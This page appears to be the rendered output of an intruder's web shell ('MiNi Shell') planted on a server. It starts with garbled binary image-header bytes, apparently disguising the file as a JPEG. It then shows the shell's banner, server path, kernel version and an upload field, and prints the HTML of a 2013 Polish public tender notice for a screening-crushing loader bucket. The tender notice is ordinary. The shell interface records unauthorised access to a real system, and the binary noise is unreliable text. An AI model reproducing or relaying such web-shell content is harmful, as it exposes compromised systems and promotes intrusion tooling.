JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130307/93690-N-2013.html

<p class="kh_header"><b>Legnica: Dostawa łyżki przesiewająco - napowietrzająco - kruszącej - ZDH/08/2013</b><br>
<b>Numer ogłoszenia: 93690 - 2013; data zamieszczenia: 07.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Metali Nieżelaznych O/Legnica , ul. Złotoryjska 89, 59-220 Legnica, woj. dolnośląskie, tel. 076 8505500, faks 076 8505501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imn.legnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa łyżki przesiewająco - napowietrzająco - kruszącej - ZDH/08/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa (lub wykonanie i dostawa) do Instytutu Metali Nieżelaznych w Gliwicach Oddział w Legnicy fabrycznie nowej, nieużywanej łyżki przesiewająco - napowietrzająco - kruszącej do ładowarki kołowej typu HSW 534E (o wadze eksploatacyjnej 20 580 kg), zgodnej z niniejszą specyfikacją Istotnych Warunków Zamówienia i wykonanie przeglądów serwisowych w ramach udzielonej gwarancji. Instalacja i uruchomienie oraz przeszkolenie personelu jest integralnym elementem przedmiotu zamówienia.
	Miejsce dostawy: Instytut Metali Nieżelaznych w Gliwicach Oddział w Legnicy - Zakład Doświadczalny Hutnictwa w Legnicy, ul. Złotoryjska 194 (teren Huty Miedzi Legnica). Zaleca się, by Wykonawca, celem właściwego doboru parametrów łyżki, będącej przedmiotem zamówienia, zapoznał się z własnościami materiałów przewidzianych do przetwarzania za jej pomocą.
	Wykonawca dostarczy przedmiot umowy w ciągu maksymalnie 6 tygodni od daty zawarcia umowy. 
	Wykonawca zobowiązany jest dostarczyć urządzenie w pełni sprawne. Rok produkcji urządzenia: 2013.
Wykonawca musi posiadać serwis w promieniu maksymalnie 80 km od Legnicy. 
	Wykonawca udziela gwarancji na okres  minimum 12 miesięcy lub minimum 1000 mth pracy, (w zależności, co pierwsze nastąpi) na dostarczony sprzęt, licząc od dnia przekazania urządzenia do eksploatacji. Wykonawca będzie dokonywał wymaganych przeglądów konserwacyjnych dostarczonego sprzętu i akcesoriów w trakcie trwania gwarancji. 
	Wykonawca, w ramach umowy, wykona odpłatnie na koszt Zamawiającego wymagane techniczne przeglądy serwisowe w okresie udzielonej gwarancji, przy przebiegach określonych w dokumentacji techniczno - ruchowej.
	Wykonawca, przy przekazaniu łyżki przesiewająco - napowietrzająco - kruszącej do eksploatacji, przeprowadzi potwierdzone protokołem szkolenie praktyczne obsługi, dla pracowników wyznaczonych przez Zamawiającego.

Podstawowe parametry techniczne:
1)	napęd łyżki: hydrauliczny -  z wykorzystaniem układu hydrauliki ładowarki kołowej HSW 534E, z przepływem oleju 188 l/min (prędkość obrotowa pompy 2200 obr/min, ciśnienie 16 Mpa)
2)	maks. waga pustej łyżki gotowej do pracy:		2500 kg
3)	min. wydajność w trakcie przesiewania:			80 Mg/h
4)	min. pojemność łyżki:					2,0 m3
5)	min. powierzchnia siania:				1,5 m2
6)	min. szerokość łyżki:					2,0 m

Wykonawca zapewni (dostarczy):
1.	wraz ofertą dokumentację określającą sposób modernizacji instalacji hydraulicznej ładowarki (schemat) wraz z określeniem wymaganych parametrów armatury hydraulicznej, celem umożliwienia Zamawiającemu dokonania niezbędnych przeróbek ładowarki przed dostawą łyżki;
2.	certyfikat CE zgodny z Dyrektywą Maszynową;
3.	deklarację zgodności z normami UE;
4.	Dokumentację w postaci książkowej 1 szt., oraz elektronicznej (format .pdf) na płycie CD 1 szt., zawierającą instrukcję obsługi w języku polskim, dokumentację techniczno ruchową (DTR) zawierającą między innymi instrukcję spełniającą wymogi § 50 Rozporządzenia Ministra Gospodarki z dnia 20.12.2005r. w sprawie zasadniczych wymagań dla maszyn i elementów bezpieczeństwa - Dz.U.05.259.2170, specyfikację techniczną urządzenia;
5.	wykaz części eksploatacyjnych i materiałów eksploatacyjnych wraz z cennikiem;
6.	zakres wymaganych przeglądów gwarancyjnych;
7.	kartę lub książkę gwarancyjną (wraz z opisem warunków) z gwarancją na min. 12 miesięcy lub na min 1000 mth pracy (w zależności, co pierwsze nastąpi) od daty uruchomienia na terenie Zamawiającego; Szczegółowe warunki gwarancji dołączone zostaną do umowy w formie załącznika (który w uzgodnieniu z Zamawiającym ma obowiązek sporządzić i załączyć Wykonawca);
8.	serwis gwarancyjny i pogwarancyjny z niezwłocznym dojazdem do Zamawiającego po uprzednim zgłoszeniu faksowym, telefonicznym lub elektronicznym, zlokalizowany w odległości max. 80 km od siedziby Zamawiającego;
9.	decyzje odbioru przez UDT dotyczące dostarczonego urządzenia i dopuszczające je do użytkowania na terenie Polski, jeśli przepisy prawa wymagają uzyskania takich decyzji
10.	Deklarację Zgodności dostawcy, potwierdzającą, że urządzenie jest zgodne z postanowieniami Ministra Gospodarki z dnia 20.12.2005r. w sprawie zasadniczych wymagań dla maszyn i elementów bezpieczeństwa (wprowadzające dyrektywę 98/37/WE) i wszystkich innych dyrektyw, których wymagania odnoszę się do tego urządzenia oraz ze stosownymi normami zharmonizowanymi;
11.	Protokół realizacji szkolenia obsługi, dla pracowników wyznaczonych przez Zamawiającego.
12.	Dokument określający warunki obsługi i serwisu;

	Wykonawca zobowiązuje się świadczyć w ciągu trwania okresu gwarancyjnego usługi serwisowe w godz. 7:00 - 16:00 w dni robocze, tj. poniedziałek - piątek, z wyłączeniem sobót, niedziel oraz dni ustawowo wolnych od pracy.
	
Gdyby jakaś część urządzenia będącego elementem przedmiotu umowy okazała się wadliwa z powodu wady materiału lub niewłaściwego wykonania w ciągu trwania okresu gwarancyjnego, Wykonawca podejmie działania:
- w przypadku awarii wyłączającej łyżkę z eksploatacji w dniu jej zgłoszenia w ciągu maksymalnie 12 godzin (czas reakcji) od chwili zawiadomienia przez Zamawiającego jeżeli zgłoszenie nastąpi do godziny 12:00 włącznie lub następnego dnia rano, jeżeli zgłoszenie nastąpi po godzinie 12:00.
- w przypadku awarii nie wyłączającej łyżki z eksploatacji w ciągu 24 godzin (czas reakcji) - od momentu otrzymania pisemnego lub elektronicznego zawiadomienia przez Zamawiającego.

	Wykonawca dostarczy w formie załącznika do niniejszej umowy wykaz adresów,  numerów telefonów kontaktowych oraz adresów elektronicznych dla sytuacji awaryjnych oraz cennik stawek za roboczogodzinę dla usługi dyżuru serwisowego w soboty, niedziele i dni ustawowo wolne od pracy.
	Realizacja transportu odbędzie się na koszt Wykonawcy, przy użyciu jego pojazdów lub będących w jego dyspozycji. Ryzyko i ubezpieczenie na czas transportu leży po stronie Wykonawcy. Dokładny termin dostawy będzie uzgodniony pomiędzy stronami umowy telefonicznie i potwierdzony faksem lub mailem z wyprzedzeniem, co najmniej czterech dni roboczych przed datą dostarczenia.

	Przedmiot zamówienia wykonany zostanie zgodnie ze Specyfikacją Istotnych Warunków Zamówienia dla przetargu ZDH/08/2013, która stanowi integralną część umowy.

	Wydanie łyżki przesiewająco - napowietrzająco - kruszącej wraz z dokumentami, potwierdzone zostanie protokołem odbioru podpisanym przez upoważnionych przedstawicieli Stron, w dniu dostawy i uruchomienia. Protokół sporządzi Wykonawca. Warunkiem podpisania protokołu odbioru, jest wcześniejsze zatwierdzenie protokołu realizacji przez Wykonawcę szkolenia pracowników obsługi Zamawiającego.

	Wykonawca zapewnia spełnienie wymagań przez dostarczony sprzęt Polskich Norm w zakresie bezpieczeństwa oraz w zakresie ogólnych badań i wymagań z uwzględnieniem narażenia indywidualnego na hałas i drgania mechaniczne nie przekraczające NDN (zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 5 sierpnia 2005 r. w sprawie bezpieczeństwa i higieny pracy przy pracach związanych z narażeniami na hałas lub drgania mechaniczne).
	Wykonawca, jeśli wymaga tego stan prawny, włączy dostarczony sprzęt pod dozór UDT O/Wrocław na swój koszt i dostarczy Zamawiającemu dokumentację UDT. Zamawiający udzieli Wykonawcy stosownego pełnomocnictwa niezwłocznie po podpisaniu umowy.
	Do oferty Wykonawca dołączy kartę katalogową lub kartę techniczną oferowanego urządzenia, a także dokumentację określającą sposób modernizacji instalacji hydraulicznej ładowarki (schemat) wraz z określeniem wymaganych parametrów armatury hydraulicznej, celem umożliwienia Zamawiającemu dokonania niezbędnych przeróbek ładowarki przed dostawą łyżki.
Warunki płatności: płatność na podstawie prawidłowo sporządzonej i zatwierdzonej faktury VAT, w formie polecenia przelewu na rachunek bankowy Wykonawcy. Zamawiający dopuszcza przedpłatę w wysokości maksymalnie 30% wartości umowy, w terminie 7 dni od daty podpisania umowy i otrzymania faktury. Pozostała część płatności 70%, w terminie do 14 dni od daty dostawy i uruchomienia urządzenia oraz otrzymania prawidłowo sporządzonej faktury VAT. Podstawą wystawienia faktury będzie podpisany przez obie strony protokół odbioru, którego sporządzenie jest obowiązkiem Wykonawcy.
	Do podanej w formularzu ofertowym ceny netto zostanie doliczony podatek VAT zgodnie z obowiązującymi przepisami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 43.26.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na formularzu zgodnym z treścią Załącznika nr 1 do SIWZ, opatrzone czytelnym podpisem oraz pieczątką firmową</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na formularzu zgodnym z treścią Załącznika nr 1 do SIWZ, opatrzone czytelnym podpisem oraz pieczątką firmową
- Wykaz zrealizowanych dostaw o zakresie odpowiadającym zakresowi zamówienia wraz z dokumentami potwierdzającymi należyte wykonanie (np. referencje)
- Rysunek łyżki oraz kartę charakterystyki, potwierdzające spełnienie parametrów założonych w SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na formularzu zgodnym z treścią Załącznika nr 1 do SIWZ, opatrzone czytelnym podpisem oraz pieczątką firmową</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na formularzu zgodnym z treścią Załącznika nr 1 do SIWZ, opatrzone czytelnym podpisem oraz pieczątką firmową</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na formularzu zgodnym z treścią Załącznika nr 1 do SIWZ, opatrzone czytelnym podpisem oraz pieczątką firmową</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie regulacji art. 144 ust. 1 PZP Zamawiający wyraża zgodę na dopuszczalność wprowadzania zmian do umowy na zasadach i warunkach określonych w SIWZ i Ustawie PZP. Zmiana umowy może obejmować w zakresie dozwolonym przez prawo: 
1)	zmianę jakości, parametrów lub innych cech charakterystycznych dla przedmiotu zamówienia, w tym zmianę numeru katalogowego produktu bądź nazwy własnej produktu; 
II. Warunkami dokonania zmian wskazanych w pkt. I mogą być: 
1)	wprowadzony zostanie na rynek przez wykonawcę przedmiot umowy zmodyfikowany bądź udoskonalony, 
2)	nastąpi zmiana organizacyjna leżąca po stronie Zamawiającego, 
3)	wymagać tego będzie prawidłowa realizacja przez Zamawiającego zadań polegających na wykonywaniu świadczeń działalności podstawowej (statutowej),
4)	w wyniku zmiany Umowy możliwe będzie podniesienie poziomu/jakości działalności prowadzonej przez Zamawiającego albo/lub w wyniku zmiany Umowy możliwe będzie podniesienie poziomu/jakości działalności statutowej Zamawiającego,
5)	będzie to konieczne ze względu na zapewnienie bezpieczeństwa lub zapobieżenie awarii, albo będzie to konieczne ze względu na zmianę powszechnie obowiązujących przepisów prawa,
6)	zmiana w inny sposób dostarczy pożytku Zamawiającemu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imn.legnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.imn.legnica.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2013 godzina 12:50, miejsce: Oddział IMN w Legnicy - sekretariat
ul. Złotoryjska 89
59-220 Legnica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com